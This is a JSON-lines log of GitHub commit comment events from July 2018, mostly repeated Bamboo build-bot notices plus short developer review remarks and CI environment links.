{"id":"8032694430","type":"CommitCommentEvent","actor":{"login":"trexbatman"},"repo":{"name":"giselyalves13/angelHack2018"},"payload":{"comment":{"id":29869927,"position":null,"line":null,"path":null,"commit_id":"8b11de954a8a5ce543d1b14e21b20759d1a8b61c","created_at":"2018-07-28T18:19:19Z","updated_at":"2018-07-28T18:19:19Z","author_association":"COLLABORATOR","body":"IGBE Rural ou Urbana [ftp://geoftp.ibge.gov.br/organizacao_do_territorio/tipologias_do_territorio/classificacao_e_caracterizacao_dos_espacos_rurais_e_urbanos_do_brasil/Shapefile/](url)"}},"created_at":"2018-07-28T18:19:19Z"}
{"id":"8032694508","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29869928,"position":null,"line":null,"path":null,"commit_id":"624a61fa2266e4c2fab9a3faac1cc9c374ee963d","created_at":"2018-07-28T18:19:22Z","updated_at":"2018-07-28T18:19:22Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-86](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-86).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-86-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T18:19:22Z"}
{"id":"8032694676","type":"CommitCommentEvent","actor":{"login":"tosteiner"},"repo":{"name":"tosteiner/site"},"payload":{"comment":{"id":29869929,"position":null,"line":null,"path":null,"commit_id":"de320fb60e60b05d917e726f20dcf7ba4e8933a7","created_at":"2018-07-28T18:19:29Z","updated_at":"2018-07-28T18:19:29Z","author_association":"OWNER","body":"theme"}},"created_at":"2018-07-28T18:19:29Z"}
{"id":"8032694729","type":"CommitCommentEvent","actor":{"login":"igaribay"},"repo":{"name":"igaribay/SSOrlando"},"payload":{"comment":{"id":29869932,"position":null,"line":null,"path":null,"commit_id":"8f0f0776c34489d1a33e48e8212aed7ad4d5e2ed","created_at":"2018-07-28T18:19:31Z","updated_at":"2018-07-28T18:19:31Z","author_association":"OWNER","body":"Comment: great idea, nice 5 new lines :)"}},"created_at":"2018-07-28T18:19:31Z"}
{"id":"8032694750","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"DmitriChe/python-alorithms-hw"},"payload":{"comment":{"id":29869933,"position":24,"line":24,"path":"hw5/task5_2_functions.py","commit_id":"29afeb91c91e2a48948cebbf9db573785edd80f3","created_at":"2018-07-28T18:19:32Z","updated_at":"2018-07-28T18:19:32Z","author_association":"NONE","body":"В списке экономите память, во множестве - время на поиск элемента.\r\nЭто я так. Напомнить то, что вы и так знаете."}},"created_at":"2018-07-28T18:19:32Z"}
{"id":"8032694933","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29869938,"position":null,"line":null,"path":null,"commit_id":"6a34adae887f8c6532396c9038f8cb9fcd77427f","created_at":"2018-07-28T18:19:41Z","updated_at":"2018-07-28T18:19:41Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-87](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-87).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-87-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T18:19:41Z"}
{"id":"8032695428","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29869939,"position":4,"line":10,"path":"src/hdskins/java/com/voxelmodpack/hdskins/upload/awt/ThreadOpenFile.java","commit_id":"b7af3a2c8d9d2442c110dcd16192c87917959421","created_at":"2018-07-28T18:20:04Z","updated_at":"2018-07-28T18:20:04Z","author_association":"MEMBER","body":"[`StringUtils.isBlank()`](https://commons.apache.org/proper/commons-lang/apidocs/org/apache/commons/lang3/StringUtils.html#isBlank-java.lang.CharSequence-)"}},"created_at":"2018-07-28T18:20:04Z"}
{"id":"8032697435","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29869948,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-28T18:21:25Z","updated_at":"2018-07-28T18:21:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:21:25Z"}
{"id":"8032697651","type":"CommitCommentEvent","actor":{"login":"BluSpring"},"repo":{"name":"DarkoPendragon/discord.js-music-bot-bluspring"},"payload":{"comment":{"id":29869949,"position":null,"line":null,"path":null,"commit_id":"0c4b4b2d69b37c80ffde4d96ac626eefeed270f6","created_at":"2018-07-28T18:21:35Z","updated_at":"2018-07-28T18:21:35Z","author_association":"NONE","body":"Beauty*"}},"created_at":"2018-07-28T18:21:35Z"}
{"id":"8032698460","type":"CommitCommentEvent","actor":{"login":"masimplo"},"repo":{"name":"ionic-team/ionic"},"payload":{"comment":{"id":29869950,"position":6,"line":24,"path":"angular/src/directives/navigation/ion-router-outlet.ts","commit_id":"266336effef55aa539b78dd62880a6edf4faa8d0","created_at":"2018-07-28T18:22:11Z","updated_at":"2018-07-28T18:22:11Z","author_association":"CONTRIBUTOR","body":"Shouldn't this be set to the passed value?"}},"created_at":"2018-07-28T18:22:11Z"}
{"id":"8032709017","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29869994,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-28T18:29:51Z","updated_at":"2018-07-28T18:29:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:29:51Z"}
{"id":"8032709091","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29869997,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-28T18:29:55Z","updated_at":"2018-07-28T18:29:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:29:55Z"}
{"id":"8032710619","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870004,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-28T18:30:58Z","updated_at":"2018-07-28T18:30:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:30:58Z"}
{"id":"8032710856","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870005,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-28T18:31:08Z","updated_at":"2018-07-28T18:31:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:31:08Z"}
{"id":"8032712233","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870006,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-28T18:32:06Z","updated_at":"2018-07-28T18:32:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:32:06Z"}
{"id":"8032712619","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870008,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-28T18:32:21Z","updated_at":"2018-07-28T18:32:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:32:21Z"}
{"id":"8032713775","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870011,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-28T18:33:16Z","updated_at":"2018-07-28T18:33:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:33:16Z"}
{"id":"8032714086","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29870012,"position":34,"line":31,"path":"src/stages/TestingStage.java","commit_id":"f21938717d0afa914ca2dfd1a7728f35e8c61df7","created_at":"2018-07-28T18:33:31Z","updated_at":"2018-07-28T18:33:31Z","author_association":"CONTRIBUTOR","body":"where do you get the 2.5 from?\r\nalso what is the pixel to meters conversion factor?\r\nI've been using 32 pixels per meter"}},"created_at":"2018-07-28T18:33:31Z"}
{"id":"8032714176","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870013,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-28T18:33:35Z","updated_at":"2018-07-28T18:33:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:33:35Z"}
{"id":"8032715262","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870025,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-28T18:34:25Z","updated_at":"2018-07-28T18:34:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:34:25Z"}
{"id":"8032715756","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870027,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-28T18:34:48Z","updated_at":"2018-07-28T18:34:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:34:48Z"}
{"id":"8032715974","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870033,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-28T18:34:58Z","updated_at":"2018-07-28T18:34:58Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-28T18:34:58Z"}
{"id":"8032716167","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29870034,"position":null,"line":null,"path":null,"commit_id":"3851b1112e4fa1c04a65e312a289b542aea57f19","created_at":"2018-07-28T18:35:08Z","updated_at":"2018-07-28T18:35:08Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-89](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-89).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-89-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T18:35:08Z"}
{"id":"8032716711","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870036,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-28T18:35:32Z","updated_at":"2018-07-28T18:35:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:35:32Z"}
{"id":"8032717387","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870037,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-28T18:36:01Z","updated_at":"2018-07-28T18:36:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:36:01Z"}
{"id":"8032718295","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870038,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-28T18:36:40Z","updated_at":"2018-07-28T18:36:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:36:40Z"}
{"id":"8032719061","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870040,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-28T18:37:14Z","updated_at":"2018-07-28T18:37:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:37:14Z"}
{"id":"8032719599","type":"CommitCommentEvent","actor":{"login":"sahil107"},"repo":{"name":"git-lfs/git-lfs"},"payload":{"comment":{"id":29870041,"position":null,"line":null,"path":null,"commit_id":"9377560199b9d7cd2d3c38524a2a7f61aedc89db","created_at":"2018-07-28T18:37:40Z","updated_at":"2018-07-28T18:37:40Z","author_association":"NONE","body":"9377560"}},"created_at":"2018-07-28T18:37:40Z"}
{"id":"8032719744","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870042,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-28T18:37:47Z","updated_at":"2018-07-28T18:37:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:37:47Z"}
{"id":"8032720567","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870043,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-28T18:38:25Z","updated_at":"2018-07-28T18:38:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:38:25Z"}
{"id":"8032720813","type":"CommitCommentEvent","actor":{"login":"0sander"},"repo":{"name":"0sander/stratux_air_nav_pro"},"payload":{"comment":{"id":29870044,"position":null,"line":null,"path":null,"commit_id":"f6d94e06da489a3e6a444d3ecc49e637e775bc0b","created_at":"2018-07-28T18:38:37Z","updated_at":"2018-07-28T18:38:37Z","author_association":"OWNER","body":"The stratux.conf is not a logfile but a config file. It can be found in /etc/stratux.conf as stated in the README..."}},"created_at":"2018-07-28T18:38:37Z"}
{"id":"8032721213","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870047,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-28T18:38:55Z","updated_at":"2018-07-28T18:38:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:38:55Z"}
